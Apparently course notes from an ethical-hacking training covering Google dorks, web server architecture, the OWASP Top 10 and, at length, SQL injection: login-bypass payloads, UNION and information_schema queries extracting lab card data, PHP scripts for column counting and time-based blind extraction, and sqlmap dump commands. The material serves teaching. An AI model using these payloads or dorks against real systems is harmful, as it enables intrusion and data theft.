  4. intext : <Text> This dork can be used to search for specific keywords in the body of the web page. So if you type “intext: webcam login” it returns a lot of interesting results, some of which look like login pages of live webcams across the globe. Some have weak passwords, or no passwords at all, which makes them vulnerable to attack.

  5. filetype: <Type> This is the most useful dork, and can be used to filter out web pages which have a particular type. This dork can be used to search for documents (pdf), spreadsheets (xls), webpages (html), server pages (php), executables (exe), presentations (ppt) and much more. A lot of students use it to quickly find pdfs related to the assignments that they are supposed to make. For example, if you do a search for “Revolt of 1857 filetype: pdf” you get a result of all pdfs on the topic.

  6. ext: <File extension> This is similar to the “filetype: <Type>” dork, and can be used to search for specific or uncommon file extensions. E.g. “ext:config” returns a list of configuration files with names like “filename.config”.

  7. “Exact word” We have already learnt how to use this dork in the previous topic. When we search for a keyword without putting double quotes, the result includes pages which have the exact word, or synonyms, or other related material. But, when we do a search using double quotation marks, the search is more specific, and returns only those web pages which actually contain the keyword as it is.

  8. Negative search - (minus) This search is used to eliminate certain types from the main search. For example, you want to find out platforms that have the beginners guide to C++. But, you want a free version of the book, and not a paid one. So you can simply search for “Beginner's guide to C++ -buy -order -purchase -pay” to get results of free books.

  9. “Keyword 1” | “Keyword 2” This search can be used to put an OR between keywords, which are in double quotes. Eg: “admin login” | “administrator login”

These are powerful when combined (as they help us filter out information) e.g. site:internshala.com intext: login intext: password.

  • There is a mine of dorks, containing thousands of dorks and this mine is called GHDB (google hacking database).

  • A website is a collection of web pages that can be interpreted by a browser.

Basics of web architecture

→ A web page is an HTML document that makes up the front end part of the website.

→ All the pages that we see while browsing through a website are its web pages.

What is HTML? It stands for HyperText Markup Language. It is used to build the front end part of a website, i.e. the look & feel of the website. This language is used to describe how the browser is supposed to display a document.

Front end: the part of the website the user sees; it runs on the client side, i.e. in the browser of the user. So whatever we see on screen is the front end (the front end is usually written using HTML).

Back end: the part where the logic of the website is written & executed. This part is responsible for making the website dynamic & functional. It can perform logical actions like doing calculations, fetching data at the user's request, storing data in the database in an effective & secure way, and so on. This logic depends on the functionality of the website.

Terms related to architecture of a website: website, web pages, HTML front end, back end.

Web servers: Web servers can be of various types. Each one has a specific function, and hence a specific configuration. Let us read about some of the most common web servers.

Application Server: This server executes the main business logic of the application. Whenever the user requests for something, the application server runs the code written by the developer.

Database Server: A database server is a system where all the data is stored. Whenever the user requests some data, it is fetched from the database server. The data is stored here in an efficient and secure manner.

Backup Server: This server helps us create backups for files, data, etc. This is done to prevent the loss of data in case of an unexpected failure. A backup server can also act like the secondary server, in case the primary server is down.

DNS Server: The Domain Name Server manages the domain names and their IP addresses. The main function of a DNS server is to map a domain name to its respective IP address.

Mail Server: A mail server is used for sending and receiving emails. Some of the protocols used for this transfer are SMTP, POP, IMAP, etc. The Microsoft Exchange Server is an example of a mail server.

Depending on the size of the web application, all these servers can be present on one physical server or on separate servers.

Common Security Misconceptions:

  1. If a website uses HTTPS, it is secure.

In HTTP → data is not secure as it is not encrypted & hence it is transferred as plain text (anyone can look at it & understand)

In HTTPS → data is encrypted. If a hacker sees the data, he cannot understand what is written until he decrypts (decodes) it. It is possible that the encryption logic used is too weak (kind of like the logical reasoning questions we solve), and hackers can crack the code.

Therefore, if a website uses HTTPS, it can still be hacked using other techniques.

  2. If a website has a firewall/IDS/IPS, it cannot be hacked.

→Firewall: A firewall is a network security system that monitors & controls incoming & outgoing network packets. It prevents unauthorised requests from reaching the server.

→ IDS (intrusion detection system): this system detects any intrusion or malicious activity inside the network & tells the admin about it.

→ IPS (intrusion prevention system): It prevents the malicious agent from causing any harm inside the system.

How do these work? Firewall, IDS & IPS have a list of agents & signatures that are malicious and that need to be blocked. It is just like the criminal records kept by the police.

They read all the incoming data packets & if they find any malicious signature in any data packet, They block it right away.

  • But what if they get a request with a new signature which is not part of this blocklist? A skilled hacker can try to bypass the checks that the IDS and IPS put in. In that case, they can't block it. Hence, even if the website has these security systems in place, it is possible to bypass them & the website is not fully secure.

Therefore, if a website has a firewall, IDS or IPS, it is possible to bypass the security measures.

  3. Hiding a file/folder/domain is the same as protecting them.

Hackers can get access to critical files by brute forcing, guessing or simply by doing a Google search using Google dorks. Hence, one can find a file even after it is hidden inside many layers/folders. It is important to put strong passwords and security checks on domains & subdomains that are not advertised to the public.

Therefore, Even if the files/folders / domains are hidden, it is important to put strong security checks on them.

Now, let’s look at these 5 servers we had read about in the previous chapter. So, like we said, it is not necessary to have these as 5 different servers, but a combination of these can be present in one physical server, depending on the requirement of the application.

Now, this server will have some architecture which should be appropriate for the kind of functions that the server will perform. This architecture is called a web server architecture. It is made up of these 5 basic elements. Let’s look at each one of these.

Server OS- Just like every computer has an operating system, similarly the computer that hosts the website also needs to have an OS. Examples are Linux, Windows, IBM AIX, etc.

Server Software- We know that every website needs to address the incoming requests of the users. This request could be for a web page in the website, or for any other functionality that the website provides. For this, the server needs to run the code of the website to generate a response for the user. But, to handle all this function, the server needs a software which is called the server software. Examples are Apache, nginx, IIS, etc.

Programming Language- Every website has a backend part which is basically written as lines of code, using a programming language. So, the web server architecture includes a particular programming language that is used to write this code. Examples are: PHP, Python, Perl, Ruby, ASP (.NET), JSP, etc.

Database Software- Every website has users and it stores the information of these users in the database. So your login credentials, your preferences, cart items in case of an e-commerce, or any other details that you provide while accessing a website is stored in the database in a secure and efficient manner. And to access this data from the database, software is required. This is known as database software. Examples are: MySQL, MS SQL, MongoDB, Casandra DB, PostgreSQL, etc.

Front End Components- So, we know that every website has a frontend or a user interface, which is what the user sees on the browser while browsing through the website. So, there needs to be a front end language to write the front end code. Examples are: HTML, javascript, Jquery, CSS, Bootstrap, etc.

Now, we know that the architecture will contain one of each of these elements. We will look at some of the most common combinations of web server architecture in the next lesson.

Some of the most common web server architecture combinations are: (The front end component is not mentioned in any of these architecture combinations.)

WAMP: stands for Windows, Apache, MySQL, PHP.

LAMP: stands for Linux, Apache, MySQL, PHP. It is one of the most frequently used combinations since all the components are available free of cost.

MAMP: stands for Mac, Apache, MySQL, PHP. It is most commonly used for web development and local testing by Mac OS based developers.

XAMPP: unlike the other web server architectures, XAMPP can be used across any operating system, so the X in XAMPP stands for cross platform. The rest of it stands for Apache, MariaDB, PHP and Perl.

WIMSA- It is the most commonly used Windows architecture. WIMSA stands for Windows, IIS, MS SQL, ASP.NET.

Some of the other non-abbreviated web server architectures are:

Windows, Tomcat, JSP, PostgreSQL

PHP, nginx, MongoDB

Python, nginx, MongoDB

To give you a clear picture, the most commonly used OS is Linux, Apache is the most commonly used server software and PHP is the most commonly used server side programming language.

Please learn the basics of HTML, javascript and PHP before proceeding.

How is data sent?

Data is sent using GET and POST methods. These methods are used as attribute value pairs in the form tag.

GET → used to fetch output based on given data.

POST → used to submit or update data in the database.

Reasons Why GET method cannot be used at all times:

→ GET requests get stored in the browser history, & it is not advised to store critical data in the browser history.

→ GET requests can be used for relatively smaller data (generally 2048 characters), as compared to POST, which theoretically has no limit.

→ GET requests cannot be used for all kinds of characters. We can only send ASCII data using GET requests, whereas POST methods support a variety of characters.

→ File uploading cannot be done using GET. If you want an HTML form to upload files, you have to use the POST method.
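To see the difference in practice, here is a minimal sketch (assuming the third-party requests library is installed) that sends the same kind of data once as GET and once as POST; httpbin.org is used as a stand-in server that echoes back what it receives.

import requests

# GET: the data travels in the URL as a query string (visible in history, length-limited).
r1 = requests.get("https://httpbin.org/get", params={"q": "internships"})
print(r1.url)  # ends with /get?q=internships

# POST: the data travels in the request body, not in the URL.
r2 = requests.post("https://httpbin.org/post", data={"username": "husky", "password": "secret"})
print(r2.json()["form"])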


Vulnerability Assessment & Penetration testing (VAPT)

What is Vulnerability Assessment? (VA)

The phase where a hacker or a security expert tries to find all the vulnerabilities in a system is called the Vulnerability Assessment phase.

Penetration testing: (PT)

The hacker tests the exploitability of a vulnerability, i.e. he checks how much damage he can cause by exploiting that vulnerability.

OWASP Top 10 - 2013

Before we jump into the technicalities of the vulnerabilities listed in the OWASP Top 10 2013 list, let’s quickly try to understand how these vulnerabilities work.

Vulnerability

Explanation

Injection

It allows hackers to inject server side codes or commands. These are the flaws that allow a hacker to inject his own codes/commands into the web server that can provide illegal access to the data.

Broken Authentication and Session Management

These flaws generally arise when application functions related to security and session management are not implemented properly, which allows hackers to bypass authentication mechanisms. For eg. Login

Cross Site Scripting (XSS)

This is one of the most common flaws in which hackers inject codes like HTML, JS directly into the web pages allowing them to deface websites and steal data of the users who trust these websites.

Insecure Direct Object References (IDOR)

These are the flaws that may cause severe impact as with IDORs, the hackers get access to objects in the database that belong to other users, which allows them to steal or even edit critical data of other users on the website. They can either steal that information or even delete someone’s account.

Security Misconfigurations

These are again one of the most common flaws as the developers/administrators forget to securely seal an application before making it live. Common flaws under this vulnerability include keeping default password, default pages etc.

Sensitive Data Exposure

These types of flaws occur when websites are unable to protect sensitive data like credit card information, passwords etc. which allows hackers to steal this information and may cause credit card fraud or identity theft.

Missing Function-Level Access Controls

These flaws occur when security implementations are not implemented properly in applications on both User interface and server i.e. front and back end respectively. This allows hackers to bypass security and gain restricted access.

Cross Site Request Forgery

This vulnerability allows a hacker to send forged requests on behalf of a trusted user, which allows the hacker to act on behalf of the user. For example, telling the bank server to transfer money from X to Y on the victim’s behalf and the bank server accepting it.

Using Components with Known Vulnerabilities

There are certain applications or their components that are known to exhibit vulnerabilities. If anyone is using these applications, it becomes easy for hackers to exploit these vulnerabilities and steal user data for eg. using an older version of windows server can be exploited by using an exploit code which is available online.

Unvalidated Redirects and Forwards

This flaw redirects users from a trusted website to a malicious website, which allows hackers to steal sensitive user information. For eg. if a user visits website A which he trusts but is redirected to website X which has malware. But as the user trusts A, he ends up trusting X.

OWASP

Depending on what kind of system we are dealing with (e.g. mobile application security, firewall & filter bypass, secure code development cheat sheets, web application security etc.), how we perform VAPT may change.

For testing web Applications, the majority of the security experts follow OWASP top 10 list.

OWASP: Open Web Application Security Project

It is a huge online community of security enthusiasts that produces free resources for people in the security domain. Hackers, developers, security experts & organisations use these resources to test their web Applications.

Every few years, OWASP releases a consolidated list of the top 10 common vulnerabilities found in web applications. The 2013 one is the most popular.

Security experts & hackers use these lists as a reference to test or hack web Applications.

Introduction to SQL & Databases

Injections

Injections are the most common flaws or vulnerabilities found in web applications.

Most common Injection: SQL injection.

What is SQL?

SQL is Structured Query Language, which is used to query data from the database.

SQL basically helps web applications communicate with the database software to retrieve data from, or store data in, the database.

What is a database?

A set of neatly structured data, e.g. a library.

→ it helps in making units of data more accessible.

→ Database is a collection of data stored by a website in a particular format. This data can be all the application info like: User info, messages, posts etc.

→ These databases store data in the form of tables.

Q. What are injections?

Ans. These are the vulnerabilities through which attackers gain illegal access to the data. It allows attackers to directly insert their commands/codes into the web server.

Q. What is SQL?

SQL is short for Structured Query Language, which is used to query data from the database. It helps in communicating with the database software to retrieve/store data from/in the databases.

Q. What is a database?

A database is a part of the database software in which all the application information like user information, messages, posts etc. is placed in a structured, easy to access and secure way. These databases contain tables; tables contain columns and rows, and each row has separate cells storing data against a specific column in a specific format.

Q. How is SQL used to communicate with database software?

SQL is a language which is used inside Server Side Programming Languages to communicate to database software in order to Save data in databases and retrieve it later.

Q. What are the three types of commands used in MySQL?

Data Definition Language (DDL):- This command is used to define the structure of the data like how and where it would be stored. It is used in creating databases and tables, defining the structure of the tables and the columns. Examples include :- Create table, Alter table, Drop table.

Data Manipulation Language (DML): These commands are used to manipulate already existing data inside a table or to insert new data (rows) into a table. They help to edit, delete and create rows. Example commands: INSERT INTO <table>, UPDATE <table> and DELETE FROM <table>.

Data Query Language (DQL): These commands are used to query data from the database, i.e. fetch required data. They are used to fetch data from all the rows, fetch specific data, sort data and even calculate values from the rows. Examples: SELECT <columns> FROM <table>, ORDER BY <column>.

Please learn to write basic SQL queries, and incorporate SQL with PHP before proceeding.
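
To get a feel for how SQL sits inside PHP, here is a minimal sketch (not from the original notes). The database name hacking_lab, the credentials and the students table used below are hypothetical placeholders for a local lab setup.

<?php
// Hypothetical connection details - replace with your own lab values.
$db = new mysqli('localhost', 'lab_user', 'lab_password', 'hacking_lab');

// DDL: define the structure of a table.
$db->query("CREATE TABLE IF NOT EXISTS students (id INT PRIMARY KEY, name VARCHAR(50), age INT, gpa DECIMAL(3,1))");

// DML: insert and update rows.
$db->query("INSERT INTO students (id, name, age, gpa) VALUES (1, 'Teeya', 19, 8.5)");
$db->query("UPDATE students SET gpa = 8.7 WHERE id = 1");

// DQL: fetch rows back.
$result = $db->query("SELECT name, gpa FROM students ORDER BY name");
while ($row = $result->fetch_assoc()) {
    echo $row['name'] . ' - ' . $row['gpa'] . "\n";
}
?>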

Introduction to SQL injection: authentication bypass

When we try to log in, the web page checks the database to see if there is a user with the same username and password.

Query used: SELECT * FROM user WHERE username = 'husky' AND password = 'naruto123'

The key to hacking this type of login authentication lies in the SQL query: whatever we add to the username and password fields gets added to the query. Now, if we put test'hello in the password field, it will throw an error.

Query used: SELECT * FROM user WHERE username = 'husky' AND password = 'test'hello'

Similarly, we can add our own commands to the SQL query. Let's enter test' OR 'a'='a in the password field (a condition which is always true).

Query used: SELECT * FROM user WHERE username = 'husky' AND password = 'test' OR 'a'='a'

Voila! Login successful!

This is SQL injection and this attack is called authentication bypass.

  • This is a very basic attack and wouldn't work on sites like Google or Facebook.
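
To see why the payload works, here is a minimal sketch (assumed for illustration, not the lab's actual code) of how a vulnerable login script typically builds its query by concatenating user input directly into the SQL string:

<?php
// Hypothetical vulnerable login handler.
$db = new mysqli('localhost', 'lab_user', 'lab_password', 'hacking_lab'); // placeholder credentials

$username = $_POST['username'];   // e.g. husky
$password = $_POST['password'];   // e.g. test' OR 'a'='a

// The quotes inside the payload become part of the SQL itself.
$query = "SELECT * FROM user WHERE username = '$username' AND password = '$password'";

$result = $db->query($query);
if ($result && $result->num_rows > 0) {
    echo 'Login successful';      // reached because OR 'a'='a' is always true
} else {
    echo 'Invalid credentials';
}
?>

Because the final WHERE clause ends with OR 'a'='a', at least one row is always returned and the check passes without a valid password.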

Commenting Out Part of an SQL Query

While performing SQL injection, you will sometimes need to comment out the rest of the query after the payload. Here's how you can do that:

In case of an input field: enter a space, then two hyphens, and then another space after the payload. For example: password' or '1' = '1' --

If the above method doesn't work, you can try entering a hash after the payload. For example: password' or '1' = '1'#

In case of a URL: a space at the end of a URL doesn't get registered in the query, so you can't just type space, two hyphens and then a space at the end of a URL. The plus sign (+) is the URL-encoded form of a space. So, to comment out the rest of the query in a URL, you have to type space, two hyphens and then a plus sign after the payload. For example: something' or '1' = '1' --+

  • We can use UNION command to perform SQL injections like:

SELECT product, price FROM products UNION SELECT username, password FROM users.

Condition: number of columns should be the same.

Problems:

  1. In a real life scenario, you won't be able to see the sql query used & you would have no idea how many columns are being fetched in the existing select query.

  2. guessing the names of tables & columns doesn't always work.

Question: Study and research about concat() and group_concat() functions in MySQL and try using it in SQL injection.

Concat Function:

SQL CONCAT function is used to concatenate two strings to form a single string within a single row. So while extracting usernames and passwords, generally you do something like this (Assuming column 3 is showing the output):

For usernames:

id=1’ UNION SELECT 1,2,username,4 from users--+

For passwords:

id=1’ UNION SELECT 1,2,password,4 from users--+

But with concat(), you can get both in a single column like this:

id=1’ UNION SELECT 1,2,concat(username,password),4 from users--+

Note that there will be no space in between them but you can add a dash with this:

id=1’ UNION SELECT 1,2,concat(username,’ - ’,password),4 from users--+

GROUP_CONCAT

The GROUP_CONCAT() function in MySQL is used to concatenate data from multiple rows into one field.

Example query:-

union select 1,group_concat(table_name),3,4 from information_schema.tables--+

Here in the above query we are trying to fetch all tables present in the database in a single query. This is very helpful when a website is only giving one table at a time but we want to extract all tables.
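
In the same way, group_concat() can be pointed at information_schema.columns to pull all column names of a table into a single cell. A commonly used variant (assuming the same four-column layout as the queries above, with a hypothetical users table) looks like this:

union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'--+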

Finding the number of columns using an SQL query

How to overcome the above problems?

  1. Hit & trial method (for 1st problem):

If we know that there is a table named users in the database, and it has a column named usernames. But we don’t know how many columns are being fetched in the given website. We will use the following query:

….URL….UNION SELECT usernames, usernames FROM users.

In this, we keep adding more usernames columns until the error stops.

This is one way of knowing how many columns are being fetched in the given SQL query. But, this method is not practical when 50-100 columns are being fetched. Also, we should already know at least one column and one table name.

Therefore, a better method is, order by.

  2. Order by:

Sorts output in an ascending order, based on the name or number of columns specified.

e.g. If we have

ID | Name | Age | GPA
--- | --- | --- | ---
1 | Teeya | 19 | 8.5
2 | Ayush | 15 | 9.0
3 | Vyom | 21 | 9.7
4 | Akshat | 22 | 7.5

If we want to sort these out alphabetically.

SQL query: SELECT * FROM students ORDER BY name

ID | Name | Age | GPA
--- | --- | --- | ---
4 | Akshat | 22 | 7.5
2 | Ayush | 15 | 9.0
1 | Teeya | 19 | 8.5
3 | Vyom | 21 | 9.7

Here, we can also specify the column number instead of the name, i.e.:

SQL query: SELECT * FROM students ORDER BY 2

So, if we want to sort based on age:

SELECT * FROM students ORDER BY 3

ID | Name | Age | GPA
--- | --- | --- | ---
2 | Ayush | 15 | 9.0
1 | Teeya | 19 | 8.5
3 | Vyom | 21 | 9.7
4 | Akshat | 22 | 7.5

  • The ORDER BY command can help us speed up the process of figuring out the number of columns being fetched.

→ For doing this: instead of using UNION, add ORDER BY 1 at the end of the URL & the content will get sorted based on the contents of the 1st column. Similarly, try ORDER BY 2, ORDER BY 3…. until we get an error. If we get an error at 5, it means there were only 4 columns. This is how we find the number of columns being fetched.
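
This counting can also be scripted. The sketch below (not part of the original notes) appends ORDER BY n to a hypothetical vulnerable URL and stops at the first response containing a MySQL "Unknown column" error; the URL, the parameter name and the assumption that SQL errors are shown on the page are all placeholders for a lab setup.

<?php
// Hypothetical vulnerable endpoint: http://victim.example/products.php?id=1
for ($n = 1; $n <= 20; $n++) {
    // Trailing "-- " comments out the rest of the original query.
    $payload = rawurlencode("1' ORDER BY $n -- ");
    $response = @file_get_contents('http://victim.example/products.php?id=' . $payload);

    // MySQL reports "Unknown column 'N' in 'order clause'" once N exceeds
    // the number of columns being fetched (if the site displays SQL errors).
    if ($response === false || strpos($response, 'Unknown column') !== false) {
        echo 'The query fetches ' . ($n - 1) . " columns\n";
        break;
    }
}
?>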

Finding out the names of tables & columns in the Database

We can do this using a feature called information_Schema.

→ Suppose we have a folder in which a site stores all its databases. In this folder, there will be different databases for the different products a website has (eg: video-streaming service, mobile app, chat threads etc.). Among all these databases, there is also a database called information_schema. This database stores information about all the other databases present in the folder (it's like an index page of the whole setup). All popular database software has information_schema in it. information_schema also holds the names of all the tables & columns present in the other databases.

→ we will first need the name of the database we are working with. Here's how to find that out:

The database() function returns the name of the database currently in use. Query used: ….URL…..UNION SELECT database(), database(), database(), database()

4 times because we know that 4 columns were being fetched in the Existing query (last query we were working with).

Output:

kjsndckjnsc | snmcsmncsk | kdjabkdjakdbk | nadkjlnqkjnwkqj
SQL-Injection-V4 | SQL-Injection-V4 | SQL-Injection-V4 | SQL-Injection-V4

→ SQL-Injection-V4 is the name of the database we are interacting with.

→ There's a table called 'tables' in information_schema. It holds the names of all the other tables. It has many columns, but the 2 columns we need are table_name & table_schema.

table_name holds the names of all the tables & table_schema holds the name of the database that the tables are associated with.

  • Most likely, we won't be able to fetch data from other databases, since we are interacting with the SQL_Injection_V4 database.

To get the names of all the tables in SQL_Injection_V4, the query used is:

…..URL….UNION SELECT table_name, table_name, table_name, table_name FROM information_schema.tables WHERE table_schema = "SQL_Injection_V4"

Output:

hgjkgvgkhvk | fdgcjvghjvh | yfhgfjhgc | ydfgxsgfsfdgj
bank_details | bank_details | bank_details | bank_details
users | users | users | users
movies | movies | movies | movies

→ There is another table in information_schema which holds the names of all the columns in the database. Its name is 'columns' & it looks like this:

tftyjfhgvb | Column_name | table_name | table_schema | utfjghfgbv
--- | --- | --- | --- | ---
Hjgjhgjh | Column 1 | Table 1 | SQL-Injection-V4 | Gfvbnfc

We can fetch the names of all the columns in the bank_details table by writing this query:

….URL….UNION SELECT column_name, column_name, column_name, column_name FROM information_schema.columns WHERE table_schema = "SQL-Injection-V4" AND table_name = "bank_details"

fghfvkgmbhcv | hjgnmbvg | yfgkxdgf | tyghchk
ID | ID | ID | ID
Account_no | Account_no | Account_no | Account_no
CVV | CVV | CVV | CVV

To fetch Account_no & CVV:

…URL…UNION SELECT Account_no, cvv, Account_no, cvv FROM bank_details.

yhjgvnmgfvkhgc | ugjfcgrdedi | tfhgdjdsjsrs | fhkgmdtjy
123….6969 | 123 | 123….6969 | 123

How to perform SQLi in POST parameters:

→ Usually the POST parameter is used as it is safer.

→ we perform SQL injections by:

When the browser sends a post request to a server, we intercept the request in between, inject the parameters, & then send the request to the server. We do this using a proxy server.

→ Proxy server software we are going to use is: Burp Suite

→ Burp Suite is a local proxy server that we can run on our own workstation & configure our browser to send all its traffic through.

→ It is one of the most used hacking tools in VAPT & is specifically designed for security experts.

→ It can do much more than just POST based SQL injections.

→ We will be using the Community Edition of Burp Suite (free). With this, we can intercept HTTP requests, alter them and release them to the servers. It can also keep a log of all the requests flowing through & even replay them later, whenever required.

  • With burp Suite, we can gain complete visibility & control of all the requests that the front end of a website sends to the backend.

  • For burp suite:

127.0.0.1 → loopback IP address.

8080 → Port number.

Whenever we search for something on a browser configured with Burp Suite, the page will keep loading because the request is being intercepted in the background; we have to forward the request in Burp Suite for it to load.

→ HTTPS requests are used to prevent hackers from snooping in.

→ To start intercepting HTTPS requests, we need to download Burp's CA certificate and then trust this CA to identify websites in the browser's certificate settings.

In burp, under the HTTP history tab, we can see that it has stored all the requests that went through the browser & each request has a request & response tab.

→ In real life, so that we don’t have to switch between browser and burp again and again, we have a feature called repeater. It lets us see the request & response simultaneously. We can also see the response as HTML & render it. (Saves time while performing VAPT). If we want to analyse the response UI, then we have to see it in the browser itself (as render doesn't always show the correct UI).

How to perform POST based SQLi using burp suite.

A typical HTTP request starts with a method: GET, POST, PUT, DELETE, OPTIONS etc. After the method name, we have the exact file path where the data is being sent, followed by the HTTP version number (e.g. HTTP/1.1). Then we have the HTTP headers. HTTP headers come in the form of name-value pairs (eg. Host: hackingenv.internshala.com, i.e. header_name: value.of.header).

Some headers are mandatory, some are programming language specific.

Host: hackingenv.internshala.com → the destination IP or the domain the request is going to.

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0 → tells the server what browser and operating system we are using.

Accept-Language: en-US, en; q=0.5

Accept-encoding: gzip, deflate

This tells the web application what kind of response we want.

Referer: http://hackingenv.internshala.com/SQL-Injection/Post-Based-SQL-Injection-variant-1/

→ tells the web application which URL the request is coming from (the header name really is spelt "Referer").

Cookie: PHPSESSID=IK……..csr7

Connection: Close.

content-type: application/x-www-form-urlencoded.

tells what type of content is being sent. Here, an HTML form is being sent.

content-length: 11

tells the character length of the data we are sending. (data sent via HTTP request.)

→ It is written at the end of the request after the headers.

Here it is referring to: flower = rose value pair being sent. This is similar to the parameter value pair that we saw in the GET parameters.

  • If we see a new header, it may contain some critical info about the security we are trying to break. So, every time you see a new header, research it & check if there are any loopholes that we can exploit. At the end of the request, we have the parameter-value pair, where we can try to perform SQL injections.

At the end, if we try to send flower=rose' , it will throw an error.

Now, the methods that we used in GET, we can extract info from the website using those same methods here too.

Advanced SQL Injections

So far, we have learnt 3 types of SQL Injections:

1. Basic Authentication Bypass

2. GET based SQL Injections

3. POST based SQL Injections

Practising these SQL injection methods is good to get you started, but there are other SQL injection methods that you should know of. So we will briefly explain 3 more SQL injection methods which you may encounter while researching or practising.

Error Based SQL Injections: Sometimes, we cannot exploit SQL injection vulnerabilities simply by using the UNION command. This may be because of some security checks in place, or because of the complexity of the code. So, to perform error based SQL injections, we make the website throw SQL errors through which we can extract critical information. Different database servers need a different approach for error based SQL injections, as the errors they throw are different in nature. For better understanding, let us look at the example below.

In Microsoft SQL Server, there is an SQL function called convert(), which converts the second parameter to the data type given in the first parameter. The syntax is: convert(<data type>,<value>). This means that if we use convert(int,'145'), the output will be 145. But what if we try to convert a value which is not valid for the data type, like convert(int,'abcd')? As you might have expected, the server will throw an error saying: "Cannot convert string 'abcd' into an int". Our motive is to perform SQL injection, so instead of convert(int,'abcd') we ask the SQL server to run convert(int,db_name()). db_name() is the same as database(); suppose the database name is 'secret_database'. If we try to convert it, the server will throw an error saying: "Cannot convert 'secret_database' into int". So, if a website shows SQL error messages, we can definitely perform SQL injection here. Using the error messages, we can retrieve the name of the database, and once the database name is known we can fetch the names of the tables, the columns and finally the data too. These injections, where we extract data through the SQL errors a web application throws, are referred to as error based SQL injections.

Boolean Based Blind Injections: To understand this injection, let's fragment it as Boolean + Blind injections. Boolean, in programming terms, simply means True or False; while performing these injections, we ask the server to respond with either true or false. The second part is Blind injections, or blind SQL injections. As the name suggests, these are used where we are able to inject successfully, but the extracted data is not visible on the website (hence the name blind), which may be attributed to how the website is built. Combining both parts: in boolean based blind injections, we perform SQL injections by asking the server True or False questions and, on the basis of the response, extract crucial information.

Let's look at the example below. Suppose a website fetches the name of a student with this SQL query: SELECT name FROM students WHERE id=121. The output will be the name of the student against the id 121. To perform a boolean based blind injection, we use the AND operator: SELECT name FROM students WHERE id=121 AND 1=1. As 1 equals 1 is universally true, the output will still fetch the name of the student.

So how is this injection different from the others, when we are just extracting the same information in a different way? Well, what if we use this query instead: SELECT name FROM students WHERE id=121 AND 1=0. Since 1 can never be equal to zero, the output will be blank. This is where boolean based blind injections come into play. The query will look like this: SELECT name FROM students WHERE id=121 AND (get_first_character_of(password))='a'--+. Look carefully: this time we are asking the server whether the first character of the password is 'a', as a true or false question. If the output shows the student's name, the password starts with 'a' and we can proceed in a similar way to fetch the complete password; if there is no output, the password must start with some other letter. This is how boolean based blind injections are performed.

Time Based Blind Injections: These injections are used in cases where we fail to extract data using either UNION or error based SQL injections, and can't ask the website True or False questions either. So, in order to extract critical information, we tamper with the server's response time. Whenever a request is made to the server, it takes some time to fetch the information and deliver it to us; this is called the response time. If we can control this response time, we can extract crucial information. The syntax is similar to boolean based blind injections: SELECT name FROM students WHERE id=121 AND (if the 1st character of the password = 'a' then sleep for 10 seconds)--+. Here, we are asking the server about the first character of the password. If the password starts with 'a', the server sleeps for 10 seconds, which means the response time increases by 10 seconds. If the password does not start with 'a', the server takes its usual response time. In a similar way, we can recover the whole password. This is how time based blind injections are performed.

Using this injection has disadvantages. Firstly, every time a guess is correct the server sleeps for 10 seconds, so the injection takes a lot of time. Secondly, the response time also depends on the speed of the internet connection; if the connection drops in between, it will increase the response time and lead to faulty results.
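
The time based idea above can be scripted with any HTTP client. Below is a minimal sketch, assuming a hypothetical URL with a numeric id parameter, a MySQL backend (so SLEEP() and SUBSTRING() exist), and a hypothetical students table; none of these names come from the notes. It guesses the password one character at a time by watching the response time:

<?php
// Hypothetical vulnerable endpoint: http://victim.example/student.php?id=121
$base   = 'http://victim.example/student.php?id=';
$secret = '';

for ($pos = 1; $pos <= 8; $pos++) {
    foreach (str_split('abcdefghijklmnopqrstuvwxyz0123456789') as $char) {
        // If the guessed character is correct, the database sleeps for 5 seconds.
        $payload = rawurlencode("121 AND IF(SUBSTRING((SELECT password FROM students LIMIT 1),$pos,1)='$char',SLEEP(5),0)");
        $start = microtime(true);
        @file_get_contents($base . $payload);
        if (microtime(true) - $start > 4) {   // noticeably slower response = correct guess
            $secret .= $char;
            echo "Recovered so far: $secret\n";
            break;
        }
    }
}
?>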

Automating SQL injections

As we saw, manually checking & exploiting SQL injections is very time-consuming. So, most security experts check & exploit SQL injection vulnerabilities using automated tools. One of the most powerful tools for finding & exploiting SQL injections is SQLMap.

What is SQL map?

SQLMap is a Python-based tool that was built to check whether parameters in an HTTP request are vulnerable to SQL injection. It can also extract data from the database using various SQL injection techniques. It supports a wide range of scenarios & use cases & works with almost all SQL database software.

Exploiting POST parameters SQLi

SQLMap does not come with a GUI (graphical user interface), so we will use the terminal.

There are switches in SQLMap (-u, -h, -p, --help, --tables, --columns).

→ If a switch is 1 character long, a single hyphen is used (-u, -h, -p).

→ If a switch is more than 1 character long, 2 hyphens are used (--help, --tables, --columns, etc.).

To test a URL for SQL injection:

For MAC: sqlmap -u “....URL….”

For windows: python sqlmap.py -u “....URL….”

The -u switch is the short version of the --url switch. It is used to pass a URL to SQLMap. When we press enter, SQLMap will start checking this URL for SQL injections. It will also ask a few questions along the way; the default answer is represented by a capital letter [Y/n].

→Depending on how complex the architecture is, SQL map may take some time.

SQLmap is now sending numerous requests to the URL we provided & is checking if the URL we provided is vulnerable to any type of SQL injection. i.e it is checking for union based, error based, boolean & time based SQL injections.

→ Testing for time based injections takes a longer time.

→ Once done (for example), we will see that SQLMap tells us that the category parameter is vulnerable to boolean based blind injection, error based injection, AND/OR time based blind injection & UNION query based injection. It also tells us that the database software is MySQL.

Now we will follow the same steps we followed earlier.

Figuring out the name of the database → figuring out names of all the tables → all the columns → ask for the data we want.

sqlmap -u "....URL…." --dbs

this will display all the databases that the URL can interact with. (eg:)

[*] information_schema

[*] SQL_Injection_V4

Now, we will: sqlmap -u “...URL…” -D “SQL_injection_V4” --tables

Output:

bank_details

movies

Users

To fetch all the columns,

sqlmap -u “...URL…” -D “SQL_injection_V4” -T “bank_details” --columns

Output:

Column | Type
--- | ---
Account_no | varchar(19)

Now,

sqlmap -u “...URL…” -D “SQL_injection_V4” -T “bank_details” -C “account_no, CVV, id” --dump

How to test Authenticated Web Pages using SQLMap?

  • Authentication is usually controlled by cookies.

  • If you are running SQLMap on a URL that you cannot access in incognito mode (access restricted), you have to pass the cookie which is responsible for the authentication to SQLMap.

sqlmap -u “...URL…” --dbs --cookie “key=F4OC…..F8A”

How to Automate POST based SQL Injections?

Turn intercept on in Burp Suite, request the page in the browser, go back to Burp Suite & select the whole request.

